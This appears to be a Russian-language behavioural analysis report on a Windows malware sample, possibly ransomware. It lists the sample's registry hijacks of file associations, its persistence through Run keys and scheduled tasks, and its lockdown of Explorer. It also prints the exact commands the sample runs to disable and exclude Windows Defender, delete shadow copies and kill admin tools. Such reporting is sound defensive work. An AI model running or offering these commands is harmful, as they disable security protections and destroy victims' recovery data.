Техническая информация
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'WindowsCryptoService' = '%APPDATA%\Microsoft\Windows\WinService.exe'
- [HKLM\Software\Microsoft\Windows\CurrentVersion\Run] 'WindowsCryptoService' = '%APPDATA%\Microsoft\Windows\WinService.exe'
- [HKCU\Software\Classes\cmdfile\shell\open\command] '' = '"blocked"'
- [HKCU\Software\Classes\batfile\shell\open\command] '' = '"blocked"'
- [HKCU\Software\Classes\mshta_file\shell\open\command] '' = '"blocked"'
- [HKCU\Software\Classes\Microsoft.PowerShellScript.1\shell\open\command] '' = '"blocked"'
- [HKCU\Software\Classes\*\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\exefile\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\lnkfile\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\Folder\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\Directory\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\Drive\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\Applications\Explorer.exe\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\http\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\https\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\ftp\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.txt\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.doc\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.docx\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.xls\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.xlsx\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.ppt\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.pptx\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.pdf\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.jpg\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.jpeg\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.png\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.gif\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.bmp\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.tiff\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.svg\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.mp3\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.mp4\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.avi\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.mkv\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.mov\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.wav\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.flac\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.zip\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.rar\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.7z\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.tar\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.gz\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.iso\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.bat\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.cmd\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.ps1\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.vbs\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.js\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.wsh\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.html\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.htm\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.csv\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.xml\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.json\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.css\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.ini\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.cfg\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.log\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.rtf\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.odt\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.lnk\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.url\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.appref-ms\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.msi\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.msc\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.cpl\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.scr\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.com\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.pif\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.docm\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.xlsm\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.pptm\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.db\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.sqlite\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.mdb\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.exe\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.dll\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.sys\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.reg\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.py\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.rb\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.pl\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.php\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.java\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.c\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- [HKCU\Software\Classes\.cpp\shell\open\command] '' = '"<Полный путь к файлу>" "%1"'
- %APPDATA%\microsoft\windows\start menu\programs\startup\windowsupdate.lnk
- <SYSTEM32>\tasks\windowsdefenderupdate
- <SYSTEM32>\tasks\windowscryptoservice
- <SYSTEM32>\tasks\windowssystemcheck
- Диспетчера задач (Taskmgr)
- Редактора реестра (RegEdit)
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoClose' = '00000001'
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRun' = '00000001'
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewContextMenu' = '00000001'
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMorePrograms' = '00000001'
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoChangeStartMenu' = '00000001'
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoTrayContextMenu' = '00000001'
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoLogOff' = '00000001'
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDesktop' = '00000001'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath '<Текущая директория>'" 2>nul
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionProcess '<Полный путь к файлу>'" 2>nul
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath '%APPDATA%\Microsoft\Windows'" 2>nul
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableRealtimeMonitoring $true" 2>nul
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableIOAVProtection $true" 2>nul
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" 2>nul
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableScriptScanning $true" 2>nul
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -SubmitSamplesConsent 2" 2>nul
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -MAPSReporting Disabled" 2>nul
- '<SYSTEM32>\taskkill.exe' /F /IM powershell.exe
- '<SYSTEM32>\taskkill.exe' /F /IM Taskmgr.exe
- '<SYSTEM32>\taskkill.exe' /F /IM msconfig.exe
- '<SYSTEM32>\taskkill.exe' /F /IM pwsh.exe
- '<SYSTEM32>\taskkill.exe' /F /IM regedit.exe
- '<SYSTEM32>\taskkill.exe' /F /IM cmd.exe
- '<SYSTEM32>\taskkill.exe' /F /IM rstrui.exe
- '<SYSTEM32>\taskkill.exe' /F /IM msiexec.exe
- %APPDATA%\microsoft\windows\winservice.exe
- %ALLUSERSPROFILE%\microsoft\windows\start menu\programs\startup\windowsupdate.lnk
- %TEMP%\svchost.vbs
- nul
- %APPDATA%\microsoft\windows\winservice.exe
- <Полный путь к файлу>
- ClassName: 'S0ci0Decrypt' WindowName: ''
- ClassName: 'Shell_SecondaryTrayWnd' WindowName: ''
- ClassName: 'Windows.UI.Core.CoreWindow' WindowName: ''
- ClassName: 'XamlExplorerHostWindow' WindowName: ''
- ClassName: 'XamlExplorerDesktopWindowTargetRoot' WindowName: ''
- ClassName: 'SearchApp' WindowName: ''
- ClassName: 'TaskListThumbnailWnd' WindowName: ''
- ClassName: 'NotifyIconOverflowWindow' WindowName: ''
- ClassName: '' WindowName: ''
- '<SYSTEM32>\wscript.exe' //B //Nologo "%TEMP%\svchost.vbs"
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v AllowRealTimeMonitoring /t REG_DWORD /d 0 /f 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v AllowCloudProtection /t REG_DWORD /d 0 /f 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Update" /v ForceUpdateFromMU /t REG_DWORD /d 0 /f 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Microsoft Antimalware\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f 2>nul (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableBehaviorMonitoring $true" 2>nul (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -PUAProtection Disabled" 2>nul (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -EnableNetworkProtection Disabled" 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c attrib +h +s "%APPDATA%\Microsoft\Windows\WinService.exe" 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c wscript.exe //B //Nologo "%TEMP%\svchost.vbs" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c schtasks /create /tn "WindowsCryptoService" /tr "\"%APPDATA%\Microsoft\Windows\WinService.exe\"" /sc onlogon /rl highest /f 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c schtasks /create /tn "WindowsDefenderUpdate" /tr "\"%APPDATA%\Microsoft\Windows\WinService.exe\"" /sc minute /mo 5 /rl highest /f 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c schtasks /create /tn "WindowsSystemCheck" /tr "\"%APPDATA%\Microsoft\Windows\WinService.exe\"" /sc onstart /rl highest /f 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c vssadmin delete shadows /all /quiet 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c wmic shadowcopy delete 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c attrib +h +s "<Полный путь к файлу>" 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM Taskmgr.exe 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM regedit.exe 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM msconfig.exe 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM rstrui.exe 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM cmd.exe 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM powershell.exe 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM pwsh.exe 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM msiexec.exe 2>nul (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c systeminfo 2>nul | find "Boot Mode" (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v AllowRealTimeMonitoring /t REG_DWORD /d 0 /f
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Get-MpPreference | Select -ExpandProperty DisableRealtimeMonitoring" (со скрытым окном)
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v AllowCloudProtection /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Microsoft Antimalware\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Update" /v ForceUpdateFromMU /t REG_DWORD /d 0 /f
- '<SYSTEM32>\attrib.exe' +h +s "%APPDATA%\Microsoft\Windows\WinService.exe"
- '<SYSTEM32>\systeminfo.exe'
- '<SYSTEM32>\schtasks.exe' /create /tn "WindowsDefenderUpdate" /tr "\"%APPDATA%\Microsoft\Windows\WinService.exe\"" /sc minute /mo 5 /rl highest /f
- '<SYSTEM32>\schtasks.exe' /create /tn "WindowsSystemCheck" /tr "\"%APPDATA%\Microsoft\Windows\WinService.exe\"" /sc onstart /rl highest /f
- '<SYSTEM32>\find.exe' "Boot Mode"
- '<SYSTEM32>\schtasks.exe' /create /tn "WindowsCryptoService" /tr "\"%APPDATA%\Microsoft\Windows\WinService.exe\"" /sc onlogon /rl highest /f
- '<SYSTEM32>\attrib.exe' +h +s "<Полный путь к файлу>"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath '<Текущая директория>'" 2>nul (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionProcess '<Полный путь к файлу>'" 2>nul (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath '%APPDATA%\Microsoft\Windows'" 2>nul (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableRealtimeMonitoring $true" 2>nul (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableIOAVProtection $true" 2>nul (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" 2>nul (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableScriptScanning $true" 2>nul (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -SubmitSamplesConsent 2" 2>nul (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -MAPSReporting Disabled" 2>nul (со скрытым окном)